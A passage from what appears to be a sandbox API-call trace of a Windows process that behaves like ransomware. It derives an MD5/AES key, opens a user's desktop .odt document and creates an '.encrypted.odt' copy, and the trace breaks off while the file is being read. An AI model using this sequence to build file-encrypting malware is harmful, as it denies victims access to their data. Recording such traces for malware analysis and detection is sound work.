wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.615] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.615] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.615] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.615] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.615] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.616] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.616] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.616] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.616] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.616] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.616] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.616] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.617] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.617] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.617] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.617] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.617] CryptHashData (hHash=0x7c2100, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.617] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.617] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.618] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.618] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.618] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0029.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0029.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.618] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0029.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.618] CryptDestroyHash (hHash=0x7c2100) returned 1 [0029.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0029.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8imsmp9ndkok.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.619] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.619] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0029.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.621] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0029.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0029.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.621] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.encrypted.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8imsmp9ndkok.encrypted.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0029.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.622] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0029.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0029.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0029.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0029.623] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.623] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x5df2, lpOverlapped=0x0) returned 1 [0029.624] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: 